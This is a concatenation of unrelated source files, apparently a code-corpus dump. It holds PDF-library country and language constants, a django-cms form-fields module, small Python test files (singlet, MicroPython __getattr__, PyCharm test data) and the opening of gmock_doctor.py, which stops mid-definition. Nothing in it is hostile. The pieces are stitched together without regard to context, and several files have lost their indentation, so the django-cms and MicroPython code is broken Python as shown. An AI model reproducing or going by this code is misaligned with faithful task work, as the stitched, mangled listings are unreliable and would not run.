HPDF_COUNTRY_AT ="AT" # AUSTRIA
HPDF_COUNTRY_AZ ="AZ" # AZERBAIJAN
HPDF_COUNTRY_BS ="BS" # BAHAMAS
HPDF_COUNTRY_BH ="BH" # BAHRAIN
HPDF_COUNTRY_BD ="BD" # BANGLADESH
HPDF_COUNTRY_BB ="BB" # BARBADOS
HPDF_COUNTRY_BY ="BY" # BELARUS
HPDF_COUNTRY_BE ="BE" # BELGIUM
HPDF_COUNTRY_BZ ="BZ" # BELIZE
HPDF_COUNTRY_BJ ="BJ" # BENIN
HPDF_COUNTRY_BM ="BM" # BERMUDA
HPDF_COUNTRY_BT ="BT" # BHUTAN
HPDF_COUNTRY_BO ="BO" # BOLIVIA
HPDF_COUNTRY_BA ="BA" # BOSNIA AND HERZEGOWINA
HPDF_COUNTRY_BW ="BW" # BOTSWANA
HPDF_COUNTRY_BV ="BV" # BOUVET ISLAND
HPDF_COUNTRY_BR ="BR" # BRAZIL
HPDF_COUNTRY_IO ="IO" # BRITISH INDIAN OCEAN TERRITORY
HPDF_COUNTRY_BN ="BN" # BRUNEI DARUSSALAM
HPDF_COUNTRY_BG ="BG" # BULGARIA
HPDF_COUNTRY_BF ="BF" # BURKINA FASO
HPDF_COUNTRY_BI ="BI" # BURUNDI
HPDF_COUNTRY_KH ="KH" # CAMBODIA
HPDF_COUNTRY_CM ="CM" # CAMEROON
HPDF_COUNTRY_CA ="CA" # CANADA
HPDF_COUNTRY_CV ="CV" # CAPE VERDE
HPDF_COUNTRY_KY ="KY" # CAYMAN ISLANDS
HPDF_COUNTRY_CF ="CF" # CENTRAL AFRICAN REPUBLIC
HPDF_COUNTRY_TD ="TD" # CHAD
HPDF_COUNTRY_CL ="CL" # CHILE
HPDF_COUNTRY_CN ="CN" # CHINA
HPDF_COUNTRY_CX ="CX" # CHRISTMAS ISLAND
HPDF_COUNTRY_CC ="CC" # COCOS (KEELING) ISLANDS
HPDF_COUNTRY_CO ="CO" # COLOMBIA
HPDF_COUNTRY_KM ="KM" # COMOROS
HPDF_COUNTRY_CG ="CG" # CONGO
HPDF_COUNTRY_CK ="CK" # COOK ISLANDS
HPDF_COUNTRY_CR ="CR" # COSTA RICA
HPDF_COUNTRY_CI ="CI" # COTE D'IVOIRE
HPDF_COUNTRY_HR ="HR" # CROATIA (local name: Hrvatska)
HPDF_COUNTRY_CU ="CU" # CUBA
HPDF_COUNTRY_CY ="CY" # CYPRUS
HPDF_COUNTRY_CZ ="CZ" # CZECH REPUBLIC
HPDF_COUNTRY_DK ="DK" # DENMARK
HPDF_COUNTRY_DJ ="DJ" # DJIBOUTI
HPDF_COUNTRY_DM ="DM" # DOMINICA
HPDF_COUNTRY_DO ="DO" # DOMINICAN REPUBLIC
HPDF_COUNTRY_TP ="TP" # EAST TIMOR
HPDF_COUNTRY_EC ="EC" # ECUADOR
HPDF_COUNTRY_EG ="EG" # EGYPT
HPDF_COUNTRY_SV ="SV" # EL SALVADOR
HPDF_COUNTRY_GQ ="GQ" # EQUATORIAL GUINEA
HPDF_COUNTRY_ER ="ER" # ERITREA
HPDF_COUNTRY_EE ="EE" # ESTONIA
HPDF_COUNTRY_ET ="ET" # ETHIOPIA
HPDF_COUNTRY_FK ="FK" # FALKLAND ISLANDS (MALVINAS)
HPDF_COUNTRY_FO ="FO" # FAROE ISLANDS
HPDF_COUNTRY_FJ ="FJ" # FIJI
HPDF_COUNTRY_FI ="FI" # FINLAND
HPDF_COUNTRY_FR ="FR" # FRANCE
HPDF_COUNTRY_FX ="FX" # FRANCE, METROPOLITAN
HPDF_COUNTRY_GF ="GF" # FRENCH GUIANA
HPDF_COUNTRY_PF ="PF" # FRENCH POLYNESIA
HPDF_COUNTRY_TF ="TF" # FRENCH SOUTHERN TERRITORIES
HPDF_COUNTRY_GA ="GA" # GABON
HPDF_COUNTRY_GM ="GM" # GAMBIA
HPDF_COUNTRY_GE ="GE" # GEORGIA
HPDF_COUNTRY_DE ="DE" # GERMANY
HPDF_COUNTRY_GH ="GH" # GHANA
HPDF_COUNTRY_GI ="GI" # GIBRALTAR
HPDF_COUNTRY_GR ="GR" # GREECE
HPDF_COUNTRY_GL ="GL" # GREENLAND
HPDF_COUNTRY_GD ="GD" # GRENADA
HPDF_COUNTRY_GP ="GP" # GUADELOUPE
HPDF_COUNTRY_GU ="GU" # GUAM
HPDF_COUNTRY_GT ="GT" # GUATEMALA
HPDF_COUNTRY_GN ="GN" # GUINEA
HPDF_COUNTRY_GW ="GW" # GUINEA-BISSAU
HPDF_COUNTRY_GY ="GY" # GUYANA
HPDF_COUNTRY_HT ="HT" # HAITI
HPDF_COUNTRY_HM ="HM" # HEARD AND MC DONALD ISLANDS
HPDF_COUNTRY_HN ="HN" # HONDURAS
HPDF_COUNTRY_HK ="HK" # HONG KONG
HPDF_COUNTRY_HU ="HU" # HUNGARY
HPDF_COUNTRY_IS ="IS" # ICELAND
HPDF_COUNTRY_IN ="IN" # INDIA
HPDF_COUNTRY_ID ="ID" # INDONESIA
HPDF_COUNTRY_IR ="IR" # IRAN (ISLAMIC REPUBLIC OF)
HPDF_COUNTRY_IQ ="IQ" # IRAQ
HPDF_COUNTRY_IE ="IE" # IRELAND
HPDF_COUNTRY_IL ="IL" # ISRAEL
HPDF_COUNTRY_IT ="IT" # ITALY
HPDF_COUNTRY_JM ="JM" # JAMAICA
HPDF_COUNTRY_JP ="JP" # JAPAN
HPDF_COUNTRY_JO ="JO" # JORDAN
HPDF_COUNTRY_KZ ="KZ" # KAZAKHSTAN
HPDF_COUNTRY_KE ="KE" # KENYA
HPDF_COUNTRY_KI ="KI" # KIRIBATI
HPDF_COUNTRY_KP ="KP" # KOREA, DEMOCRATIC PEOPLE'S REPUBLIC OF
HPDF_COUNTRY_KR ="KR" # KOREA, REPUBLIC OF
HPDF_COUNTRY_KW ="KW" # KUWAIT
HPDF_COUNTRY_KG ="KG" # KYRGYZSTAN
HPDF_COUNTRY_LA ="LA" # LAO PEOPLE'S DEMOCRATIC REPUBLIC
HPDF_COUNTRY_LV ="LV" # LATVIA
HPDF_COUNTRY_LB ="LB" # LEBANON
HPDF_COUNTRY_LS ="LS" # LESOTHO
HPDF_COUNTRY_LR ="LR" # LIBERIA
HPDF_COUNTRY_LY ="LY" # LIBYAN ARAB JAMAHIRIYA
HPDF_COUNTRY_LI ="LI" # LIECHTENSTEIN
HPDF_COUNTRY_LT ="LT" # LITHUANIA
HPDF_COUNTRY_LU ="LU" # LUXEMBOURG
HPDF_COUNTRY_MO ="MO" # MACAU
HPDF_COUNTRY_MK ="MK" # MACEDONIA, THE FORMER YUGOSLAV REPUBLIC OF
HPDF_COUNTRY_MG ="MG" # MADAGASCAR
HPDF_COUNTRY_MW ="MW" # MALAWI
HPDF_COUNTRY_MY ="MY" # MALAYSIA
HPDF_COUNTRY_MV ="MV" # MALDIVES
HPDF_COUNTRY_ML ="ML" # MALI
HPDF_COUNTRY_MT ="MT" # MALTA
HPDF_COUNTRY_MH ="MH" # MARSHALL ISLANDS
HPDF_COUNTRY_MQ ="MQ" # MARTINIQUE
HPDF_COUNTRY_MR ="MR" # MAURITANIA
HPDF_COUNTRY_MU ="MU" # MAURITIUS
HPDF_COUNTRY_YT ="YT" # MAYOTTE
HPDF_COUNTRY_MX ="MX" # MEXICO
HPDF_COUNTRY_FM ="FM" # MICRONESIA, FEDERATED STATES OF
HPDF_COUNTRY_MD ="MD" # MOLDOVA, REPUBLIC OF
HPDF_COUNTRY_MC ="MC" # MONACO
HPDF_COUNTRY_MN ="MN" # MONGOLIA
HPDF_COUNTRY_MS ="MS" # MONTSERRAT
HPDF_COUNTRY_MA ="MA" # MOROCCO
HPDF_COUNTRY_MZ ="MZ" # MOZAMBIQUE
HPDF_COUNTRY_MM ="MM" # MYANMAR
HPDF_COUNTRY_NA ="NA" # NAMIBIA
HPDF_COUNTRY_NR ="NR" # NAURU
HPDF_COUNTRY_NP ="NP" # NEPAL
HPDF_COUNTRY_NL ="NL" # NETHERLANDS
HPDF_COUNTRY_AN ="AN" # NETHERLANDS ANTILLES
HPDF_COUNTRY_NC ="NC" # NEW CALEDONIA
HPDF_COUNTRY_NZ ="NZ" # NEW ZEALAND
HPDF_COUNTRY_NI ="NI" # NICARAGUA
HPDF_COUNTRY_NE ="NE" # NIGER
HPDF_COUNTRY_NG ="NG" # NIGERIA
HPDF_COUNTRY_NU ="NU" # NIUE
HPDF_COUNTRY_NF ="NF" # NORFOLK ISLAND
HPDF_COUNTRY_MP ="MP" # NORTHERN MARIANA ISLANDS
HPDF_COUNTRY_NO ="NO" # NORWAY
HPDF_COUNTRY_OM ="OM" # OMAN
HPDF_COUNTRY_PK ="PK" # PAKISTAN
HPDF_COUNTRY_PW ="PW" # PALAU
HPDF_COUNTRY_PA ="PA" # PANAMA
HPDF_COUNTRY_PG ="PG" # PAPUA NEW GUINEA
HPDF_COUNTRY_PY ="PY" # PARAGUAY
HPDF_COUNTRY_PE ="PE" # PERU
HPDF_COUNTRY_PH ="PH" # PHILIPPINES
HPDF_COUNTRY_PN ="PN" # PITCAIRN
HPDF_COUNTRY_PL ="PL" # POLAND
HPDF_COUNTRY_PT ="PT" # PORTUGAL
HPDF_COUNTRY_PR ="PR" # PUERTO RICO
HPDF_COUNTRY_QA ="QA" # QATAR
HPDF_COUNTRY_RE ="RE" # REUNION
HPDF_COUNTRY_RO ="RO" # ROMANIA
HPDF_COUNTRY_RU ="RU" # RUSSIAN FEDERATION
HPDF_COUNTRY_RW ="RW" # RWANDA
HPDF_COUNTRY_KN ="KN" # SAINT KITTS AND NEVIS
HPDF_COUNTRY_LC ="LC" # SAINT LUCIA
HPDF_COUNTRY_VC ="VC" # SAINT VINCENT AND THE GRENADINES
HPDF_COUNTRY_WS ="WS" # SAMOA
HPDF_COUNTRY_SM ="SM" # SAN MARINO
HPDF_COUNTRY_ST ="ST" # SAO TOME AND PRINCIPE
HPDF_COUNTRY_SA ="SA" # SAUDI ARABIA
HPDF_COUNTRY_SN ="SN" # SENEGAL
HPDF_COUNTRY_SC ="SC" # SEYCHELLES
HPDF_COUNTRY_SL ="SL" # SIERRA LEONE
HPDF_COUNTRY_SG ="SG" # SINGAPORE
HPDF_COUNTRY_SK ="SK" # SLOVAKIA (Slovak Republic)
HPDF_COUNTRY_SI ="SI" # SLOVENIA
HPDF_COUNTRY_SB ="SB" # SOLOMON ISLANDS
HPDF_COUNTRY_SO ="SO" # SOMALIA
HPDF_COUNTRY_ZA ="ZA" # SOUTH AFRICA
HPDF_COUNTRY_ES ="ES" # SPAIN
HPDF_COUNTRY_LK ="LK" # SRI LANKA
HPDF_COUNTRY_SH ="SH" # ST. HELENA
HPDF_COUNTRY_PM ="PM" # ST. PIERRE AND MIQUELON
HPDF_COUNTRY_SD ="SD" # SUDAN
HPDF_COUNTRY_SR ="SR" # SURINAME
HPDF_COUNTRY_SJ ="SJ" # SVALBARD AND JAN MAYEN ISLANDS
HPDF_COUNTRY_SZ ="SZ" # SWAZILAND
HPDF_COUNTRY_SE ="SE" # SWEDEN
HPDF_COUNTRY_CH ="CH" # SWITZERLAND
HPDF_COUNTRY_SY ="SY" # SYRIAN ARAB REPUBLIC
HPDF_COUNTRY_TW ="TW" # TAIWAN, PROVINCE OF CHINA
HPDF_COUNTRY_TJ ="TJ" # TAJIKISTAN
HPDF_COUNTRY_TZ ="TZ" # TANZANIA, UNITED REPUBLIC OF
HPDF_COUNTRY_TH ="TH" # THAILAND
HPDF_COUNTRY_TG ="TG" # TOGO
HPDF_COUNTRY_TK ="TK" # TOKELAU
HPDF_COUNTRY_TO ="TO" # TONGA
HPDF_COUNTRY_TT ="TT" # TRINIDAD AND TOBAGO
HPDF_COUNTRY_TN ="TN" # TUNISIA
HPDF_COUNTRY_TR ="TR" # TURKEY
HPDF_COUNTRY_TM ="TM" # TURKMENISTAN
HPDF_COUNTRY_TC ="TC" # TURKS AND CAICOS ISLANDS
HPDF_COUNTRY_TV ="TV" # TUVALU
HPDF_COUNTRY_UG ="UG" # UGANDA
HPDF_COUNTRY_UA ="UA" # UKRAINE
HPDF_COUNTRY_AE ="AE" # UNITED ARAB EMIRATES
HPDF_COUNTRY_GB ="GB" # UNITED KINGDOM
HPDF_COUNTRY_US ="US" # UNITED STATES
HPDF_COUNTRY_UM ="UM" # UNITED STATES MINOR OUTLYING ISLANDS
HPDF_COUNTRY_UY ="UY" # URUGUAY
HPDF_COUNTRY_UZ ="UZ" # UZBEKISTAN
HPDF_COUNTRY_VU ="VU" # VANUATU
HPDF_COUNTRY_VA ="VA" # VATICAN CITY STATE (HOLY SEE)
HPDF_COUNTRY_VE ="VE" # VENEZUELA
HPDF_COUNTRY_VN ="VN" # VIET NAM
HPDF_COUNTRY_VG ="VG" # VIRGIN ISLANDS (BRITISH)
HPDF_COUNTRY_VI ="VI" # VIRGIN ISLANDS (U.S.)
HPDF_COUNTRY_WF ="WF" # WALLIS AND FUTUNA ISLANDS
HPDF_COUNTRY_EH ="EH" # WESTERN SAHARA
HPDF_COUNTRY_YE ="YE" # YEMEN
HPDF_COUNTRY_YU ="YU" # YUGOSLAVIA
HPDF_COUNTRY_ZR ="ZR" # ZAIRE
HPDF_COUNTRY_ZM ="ZM" # ZAMBIA
HPDF_COUNTRY_ZW ="ZW" # ZIMBABWE
#----------------------------------------------------------------------------
#----- lang code definition -------------------------------------------------
HPDF_LANG_AA ="aa" # Afar
HPDF_LANG_AB ="ab" # Abkhazian
HPDF_LANG_AF ="af" # Afrikaans
HPDF_LANG_AM ="am" # Amharic
HPDF_LANG_AR ="ar" # Arabic
HPDF_LANG_AS ="as" # Assamese
HPDF_LANG_AY ="ay" # Aymara
HPDF_LANG_AZ ="az" # Azerbaijani
HPDF_LANG_BA ="ba" # Bashkir
HPDF_LANG_BE ="be" # Byelorussian
HPDF_LANG_BG ="bg" # Bulgarian
HPDF_LANG_BH ="bh" # Bihari
HPDF_LANG_BI ="bi" # Bislama
HPDF_LANG_BN ="bn" # Bengali Bangla
HPDF_LANG_BO ="bo" # Tibetan
HPDF_LANG_BR ="br" # Breton
HPDF_LANG_CA ="ca" # Catalan
HPDF_LANG_CO ="co" # Corsican
HPDF_LANG_CS ="cs" # Czech
HPDF_LANG_CY ="cy" # Welsh
HPDF_LANG_DA ="da" # Danish
HPDF_LANG_DE ="de" # German
HPDF_LANG_DZ ="dz" # Bhutani
HPDF_LANG_EL ="el" # Greek
HPDF_LANG_EN ="en" # English
HPDF_LANG_EO ="eo" # Esperanto
HPDF_LANG_ES ="es" # Spanish
HPDF_LANG_ET ="et" # Estonian
HPDF_LANG_EU ="eu" # Basque
HPDF_LANG_FA ="fa" # Persian
HPDF_LANG_FI ="fi" # Finnish
HPDF_LANG_FJ ="fj" # Fiji
HPDF_LANG_FO ="fo" # Faeroese
HPDF_LANG_FR ="fr" # French
HPDF_LANG_FY ="fy" # Frisian
HPDF_LANG_GA ="ga" # Irish
HPDF_LANG_GD ="gd" # Scots Gaelic
HPDF_LANG_GL ="gl" # Galician
HPDF_LANG_GN ="gn" # Guarani
HPDF_LANG_GU ="gu" # Gujarati
HPDF_LANG_HA ="ha" # Hausa
HPDF_LANG_HI ="hi" # Hindi
HPDF_LANG_HR ="hr" # Croatian
HPDF_LANG_HU ="hu" # Hungarian
HPDF_LANG_HY ="hy" # Armenian
HPDF_LANG_IA ="ia" # Interlingua
HPDF_LANG_IE ="ie" # Interlingue
HPDF_LANG_IK ="ik" # Inupiak
HPDF_LANG_IN ="in" # Indonesian
HPDF_LANG_IS ="is" # Icelandic
HPDF_LANG_IT ="it" # Italian
HPDF_LANG_IW ="iw" # Hebrew
HPDF_LANG_JA ="ja" # Japanese
HPDF_LANG_JI ="ji" # Yiddish
HPDF_LANG_JW ="jw" # Javanese
HPDF_LANG_KA ="ka" # Georgian
HPDF_LANG_KK ="kk" # Kazakh
HPDF_LANG_KL ="kl" # Greenlandic
HPDF_LANG_KM ="km" # Cambodian
HPDF_LANG_KN ="kn" # Kannada
HPDF_LANG_KO ="ko" # Korean
HPDF_LANG_KS ="ks" # Kashmiri
HPDF_LANG_KU ="ku" # Kurdish
HPDF_LANG_KY ="ky" # Kirghiz
HPDF_LANG_LA ="la" # Latin
HPDF_LANG_LN ="ln" # Lingala
HPDF_LANG_LO ="lo" # Laothian
HPDF_LANG_LT ="lt" # Lithuanian
HPDF_LANG_LV ="lv" # Latvian,Lettish
HPDF_LANG_MG ="mg" # Malagasy
HPDF_LANG_MI ="mi" # Maori
HPDF_LANG_MK ="mk" # Macedonian
HPDF_LANG_ML ="ml" # Malayalam
HPDF_LANG_MN ="mn" # Mongolian
HPDF_LANG_MO ="mo" # Moldavian
HPDF_LANG_MR ="mr" # Marathi
HPDF_LANG_MS ="ms" # Malay
HPDF_LANG_MT ="mt" # Maltese
HPDF_LANG_MY ="my" # Burmese
HPDF_LANG_NA ="na" # Nauru
HPDF_LANG_NE ="ne" # Nepali
HPDF_LANG_NL ="nl" # Dutch
HPDF_LANG_NO ="no" # Norwegian
HPDF_LANG_OC ="oc" # Occitan
HPDF_LANG_OM ="om" # (Afan)Oromo
HPDF_LANG_OR ="or" # Oriya
HPDF_LANG_PA ="pa" # Punjabi
HPDF_LANG_PL ="pl" # Polish
HPDF_LANG_PS ="ps" # Pashto,Pushto
HPDF_LANG_PT ="pt" # Portuguese
HPDF_LANG_QU ="qu" # Quechua
HPDF_LANG_RM ="rm" # Rhaeto-Romance
HPDF_LANG_RN ="rn" # Kirundi
HPDF_LANG_RO ="ro" # Romanian
HPDF_LANG_RU ="ru" # Russian
HPDF_LANG_RW ="rw" # Kinyarwanda
HPDF_LANG_SA ="sa" # Sanskrit
HPDF_LANG_SD ="sd" # Sindhi
HPDF_LANG_SG ="sg" # Sangro
HPDF_LANG_SH ="sh" # Serbo-Croatian
HPDF_LANG_SI ="si" # Singhalese
HPDF_LANG_SK ="sk" # Slovak
HPDF_LANG_SL ="sl" # Slovenian
HPDF_LANG_SM ="sm" # Samoan
HPDF_LANG_SN ="sn" # Shona
HPDF_LANG_SO ="so" # Somali
HPDF_LANG_SQ ="sq" # Albanian
HPDF_LANG_SR ="sr" # Serbian
HPDF_LANG_SS ="ss" # Siswati
HPDF_LANG_ST ="st" # Sesotho
HPDF_LANG_SU ="su" # Sundanese
HPDF_LANG_SV ="sv" # Swedish
HPDF_LANG_SW ="sw" # Swahili
HPDF_LANG_TA ="ta" # Tamil
HPDF_LANG_TE ="te" # Tegulu
HPDF_LANG_TG ="tg" # Tajik
HPDF_LANG_TH ="th" # Thai
HPDF_LANG_TI ="ti" # Tigrinya
HPDF_LANG_TK ="tk" # Turkmen
HPDF_LANG_TL ="tl" # Tagalog
HPDF_LANG_TN ="tn" # Setswanato Tonga
HPDF_LANG_TR ="tr" # Turkish
HPDF_LANG_TS ="ts" # Tsonga
HPDF_LANG_TT ="tt" # Tatar
HPDF_LANG_TW ="tw" # Twi
HPDF_LANG_UK ="uk" # Ukrainian
HPDF_LANG_UR ="ur" # Urdu
HPDF_LANG_UZ ="uz" # Uzbek
HPDF_LANG_VI ="vi" # Vietnamese
HPDF_LANG_VO ="vo" # Volapuk
HPDF_LANG_WO ="wo" # Wolof
HPDF_LANG_XH ="xh" # Xhosa
HPDF_LANG_YO ="yo" # Yoruba
HPDF_LANG_ZH ="zh" # Chinese
HPDF_LANG_ZU ="zu" # Zulu
#----------------------------------------------------------------------------
#----- Graphics mode --------------------------------------------------------
HPDF_GMODE_PAGE_DESCRIPTION =0x0001
HPDF_GMODE_PATH_OBJECT =0x0002
HPDF_GMODE_TEXT_OBJECT =0x0004
HPDF_GMODE_CLIPPING_PATH =0x0008
HPDF_GMODE_SHADING =0x0010
HPDF_GMODE_INLINE_IMAGE =0x0020
HPDF_GMODE_EXTERNAL_OBJECT =0x0040
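#----------------------------------------------------------------------------
# Editor's note: an illustrative sketch, not part of the original constants.
# The graphics-mode values above are single-bit flags, so a permitted-mode mask
# and a membership test can be written with bitwise operators, for example:
HPDF_GMODE_EXAMPLE_MASK =HPDF_GMODE_PAGE_DESCRIPTION | HPDF_GMODE_TEXT_OBJECT
def _gmode_allows(current_mode, allowed_modes=HPDF_GMODE_EXAMPLE_MASK):
    # True when current_mode is one of the flags contained in allowed_modes.
    return (current_mode & allowed_modes) != 0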
|
qnub/django-cms | refs/heads/develop | cms/forms/fields.py | 35 | # -*- coding: utf-8 -*-
import six
from django import forms
from django.contrib.admin.widgets import RelatedFieldWidgetWrapper
from django.forms.fields import EMPTY_VALUES
from django.utils.translation import ugettext_lazy as _
from cms.forms.utils import get_site_choices, get_page_choices
from cms.forms.widgets import PageSelectWidget, PageSmartLinkWidget
from cms.models.pagemodel import Page
class SuperLazyIterator(object):
def __init__(self, func):
self.func = func
def __iter__(self):
return iter(self.func())
class LazyChoiceField(forms.ChoiceField):
def _set_choices(self, value):
        # we override this setter so that list(value) is never called
self._choices = self.widget.choices = value
choices = property(forms.ChoiceField._get_choices, _set_choices)
class PageSelectFormField(forms.MultiValueField):
widget = PageSelectWidget
default_error_messages = {
'invalid_site': _(u'Select a valid site'),
'invalid_page': _(u'Select a valid page'),
}
def __init__(self, queryset=None, empty_label=u"---------", cache_choices=False,
required=True, widget=None, to_field_name=None, limit_choices_to=None,
*args, **kwargs):
errors = self.default_error_messages.copy()
if 'error_messages' in kwargs:
errors.update(kwargs['error_messages'])
site_choices = SuperLazyIterator(get_site_choices)
page_choices = SuperLazyIterator(get_page_choices)
self.limit_choices_to = limit_choices_to
kwargs['required'] = required
fields = (
LazyChoiceField(choices=site_choices, required=False, error_messages={'invalid': errors['invalid_site']}),
LazyChoiceField(choices=page_choices, required=False, error_messages={'invalid': errors['invalid_page']}),
)
super(PageSelectFormField, self).__init__(fields, *args, **kwargs)
def compress(self, data_list):
if data_list:
page_id = data_list[1]
if page_id in EMPTY_VALUES:
if not self.required:
return None
raise forms.ValidationError(self.error_messages['invalid_page'])
return Page.objects.get(pk=page_id)
return None
def _has_changed(self, initial, data):
is_empty = data and (len(data) >= 2 and data[1] in [None, ''])
if isinstance(self.widget, RelatedFieldWidgetWrapper):
self.widget.decompress = self.widget.widget.decompress
if is_empty and initial is None:
            # when empty, data will have [u'1', u'', u''] as its value
# this will cause django to always return True because of the '1'
# so we simply follow django's default behavior when initial is None and data is "empty"
data = ['' for x in range(0, len(data))]
return super(PageSelectFormField, self)._has_changed(initial, data)
class PageSmartLinkField(forms.CharField):
widget = PageSmartLinkWidget
def __init__(self, max_length=None, min_length=None, placeholder_text=None,
ajax_view=None, *args, **kwargs):
self.placeholder_text = placeholder_text
widget = self.widget(ajax_view=ajax_view)
super(PageSmartLinkField, self).__init__(max_length, min_length,
widget=widget, *args, **kwargs)
def widget_attrs(self, widget):
attrs = super(PageSmartLinkField, self).widget_attrs(widget)
attrs.update({'placeholder_text': six.text_type(self.placeholder_text)})
return attrs
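# Editor's illustrative sketch, not part of django-cms: a minimal form showing
# how the two fields above could be declared. 'Type a page title...' and
# 'my_ajax_view' are assumed example values, not names defined in this project.
class ExamplePageLinkForm(forms.Form):
    # Resolves to a Page instance via the site/page select widget.
    page = PageSelectFormField(required=False)
    # Free-text link field whose widget suggests pages through the given ajax view.
    link = PageSmartLinkField(placeholder_text='Type a page title...',
                              ajax_view='my_ajax_view', required=False)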
|
iosonofabio/singlet | refs/heads/master | test/counts_table/test_initialize.py | 1 | #!/usr/bin/env python
# vim: fdm=indent
'''
author: Fabio Zanini
date: 15/08/17
content: Test CountsTable class.
'''
def test_initialize():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv')
def test_initialize_fromdataset():
from singlet.counts_table import CountsTable
ct = CountsTable.from_datasetname('example_dataset')
def test_initialize_128():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float128')
def test_initialize_32():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float32')
def test_initialize_16():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float16')
|
iabdalkader/micropython | refs/heads/master | tests/basics/getattr.py | 18 | # test __getattr__
class A:
def __init__(self, d):
self.d = d
def __getattr__(self, attr):
return self.d[attr]
a = A({'a':1, 'b':2})
print(a.a, a.b)
# test that any exception raised in __getattr__ propagates out
class A:
def __getattr__(self, attr):
if attr == "value":
raise ValueError(123)
else:
raise AttributeError(456)
a = A()
try:
a.value
except ValueError as er:
print(er)
try:
a.attr
except AttributeError as er:
print(er)
|
siosio/intellij-community | refs/heads/master | python/testData/inspections/PyFinalInspection/SubclassingFinalClass/a.py | 12 | from b import A
class <warning descr="'A' is marked as '@final' and should not be subclassed">B</warning>(A):
pass |
evadeflow/gmock | refs/heads/master | scripts/gmock_doctor.py | 163 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts compiler's errors in code using Google Mock to plain English."""
__author__ = '[email protected] (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_EMAIL = '[email protected]'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgPointee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in the compiler's errors.
_GCC_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(\d+:)?\s+'
_CLANG_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(?P<column>\d+):\s+'
_CLANG_NON_GMOCK_FILE_LINE_RE = (
r'(?P<file>.*[/\\^](?!gmock-)[^/\\]+):(?P<line>\d+):(?P<column>\d+):\s+')
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, diagnoses, msg):
"""Diagnoses the given disease by pattern matching.
Can provide different diagnoses for different patterns.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
diagnoses: A list of pairs (regex, pattern for formatting the diagnosis
for matching regex).
msg: Compiler's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
for regex, diagnosis in diagnoses:
if re.search(regex, msg):
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by the compiler."""
gcc_regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
clang_regex = (r'error:.*array.*negative.*\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of function template specialization '
r'\'testing::internal::ReturnAction<(?P<type>.*)>'
r'::operator Action<.*>\' requested here')
diagnosis = """
You are using a Return() action in a function that returns a reference to
%(type)s. Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'a type'})],
msg)
def _NeedToReturnSomethingDiagnoser(msg):
